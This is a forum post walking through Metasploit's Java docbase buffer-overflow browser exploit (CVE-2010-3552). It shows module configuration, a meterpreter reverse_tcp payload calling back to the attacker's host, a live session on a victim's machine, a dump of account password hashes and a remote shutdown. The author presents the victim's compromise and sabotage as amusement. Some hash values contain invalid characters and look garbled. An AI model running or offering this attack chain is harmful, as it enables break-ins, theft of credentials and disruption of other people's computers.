Dom Oct 31, 2010 9:21 pm
Well folks, I'm still entertaining myself with metasploit, and this time I bring you the latest Java one these guys put out, called "java_docbase_bof"; the author is RuS0pr0. I went looking for some info besides the metasploit links, but I'm kind of lazy so I didn't search much; the only thing I found quickly was a packet-storm link where the name showed up first in the list of the 10 latest uploads, but when I went to look at it, it said file missing. Bummer, but oh well, we have it in metasploit, heh. OK, to arms:
We open metasploit, load the exploit and see what the "info" command gives us
Code:
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 616 exploits - 306 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r10827 updated today (2010.10.26)
msf > use windows/browser/java_docbase_bof
msf exploit(java_docbase_bof) > info
Name: Sun Java Runtime New Plugin docbase Buffer Overflow
Version: 10820
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
jduck <jduck@metasploit.com>
Available targets:
  Id  Name
  --  ----
  0   Windows Universal (msvcr71.dll ROP)
Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on.
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)
Payload information:
Space: 1024
Avoid: 34 characters
Description:
This module exploits a flaw in the new plugin component of the Sun
Java Runtime Environment before v6 Update 22. By specifying specific
parameters to the new plugin, an attacker can cause a stack-based
buffer overflow and execute arbitrary code. When the new plugin is
invoked with a "launchjnlp" parameter, it will copy the contents of
the "docbase" parameter to a stack-buffer using the "sprintf"
function. A string of 396 bytes is enough to overflow the 256 byte
stack buffer and overwrite some local variables as well as the saved
return address. NOTE: The string being copied is first passed
through the "WideCharToMultiByte". Due to this, only characters
which have a valid localized multibyte representation are allowed.
Invalid characters will be replaced with question marks ('?'). This
vulnerability was originally discovered independently by both
Stephen Fewer and Berend Jan Wever (SkyLined). Although exhaustive
testing hasn't been done, all versions since version 6 Update 10 are
believed to be affected by this vulnerability. This vulnerability
was patched as part of the October 2010 Oracle Patch release.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3552
http://www.securityfocus.com/bid/44023
http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html
http://www.zerodayinitiative.com/advisories/ZDI-10-206/
http://code.google.com/p/skylined/issues/detail?id=23
http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/
http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html
OK, now we know the parameters to configure; let's look at the available payloads
msf exploit(java_docbase_bof) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager
windows/dllinject/reverse_http normal Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager
windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS)
windows/download_exec normal Windows Executable Download and Execute
windows/exec normal Windows Execute Command
windows/messagebox normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
windows/shell/reverse_http normal Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_http normal Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager
windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_http normal VNC Server (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
OK, we configure everything and check that it's right:
Code:
msf exploit(java_docbase_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(java_docbase_bof) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(java_docbase_bof) > set URIPATH /
URIPATH => /
msf exploit(java_docbase_bof) > set SRVPORT 80
SRVPORT => 80
msf exploit(java_docbase_bof) > show options
Module options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on.
  SRVPORT     80               yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH     /                no        The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
  LHOST     192.168.1.101    yes       The listen address
  LPORT     4444             yes       The listen port
Exploit target:
  Id  Name
  --  ----
  0   Windows Universal (msvcr71.dll ROP)
All perfect, so exploit:
Code:
msf exploit(java_docbase_bof) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.101:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.101:80/
[*] Server started.
We open it, enter the address and the magic begins:
msf exploit(java_docbase_bof) >
[*] Sending exploit HTML to 192.168.1.100:1096
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.100:1097) at Tue Oct 26 09:25:14 -0300 2010
[*] Session ID 1 (192.168.1.101:4444 -> 192.168.1.100:1097) processing AutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3616)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
The meterpreter session migrates and the browser crashes. Something good is that, compared to the previous one I posted, the exploit loads quite fast and we have a shell practically right away, reducing the chance that the victim closes the browser on us before meterpreter migrates.
We interact with the session, dump the hashes so we have something to entertain ourselves with later, and we shut down the remote computer; they'll blame Windows for shutting itself off:
Code:
msf exploit(java_docbase_bof) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > hashdump
ASPNET:1008:b29ace650td0c05f0bfa5a736ecadb63:fbcd22b2d8ed614f7cb996bf996ebf73:::
FDCC User:1005:921988ba001db8e1c41a0e2828864838:5f23a05483c0b292fdd922e6b05afa05:::
HelpAssistant:1004:58n8fff5b883a8711ae36084c7644de3:11a7f388fda7f3416d46e6526b346bd2:::
IUSR_XP_FDCC:1007:c36c50574cd910faaa15682618b8ea0c:2424cd6387fd1934538a7b22dc6873c7:::
IWAM_XP_FDCC:1013:640b1823bca93499f622ce50e7db4fd3:8186be975dbb9ec184fffb4ae512788a:::
Renamed_Admin:500:9225986ba001dc8e1c41a0e2828864838:5f23a05483c0b292fdd922e6b05afa05:::
Renamed_Guest:501:aad3bo55b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0qE:\Java:1002:aad3b435b51404Beaad3b435b51404ee:b656a8c9fc573685ded4bb5b3a4da7dc:::
User:1003:aad3b435b51474eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > shutdown
Shutting down...
Code:
meterpreter >
[*] Meterpreter session 1 closed. Reason: Died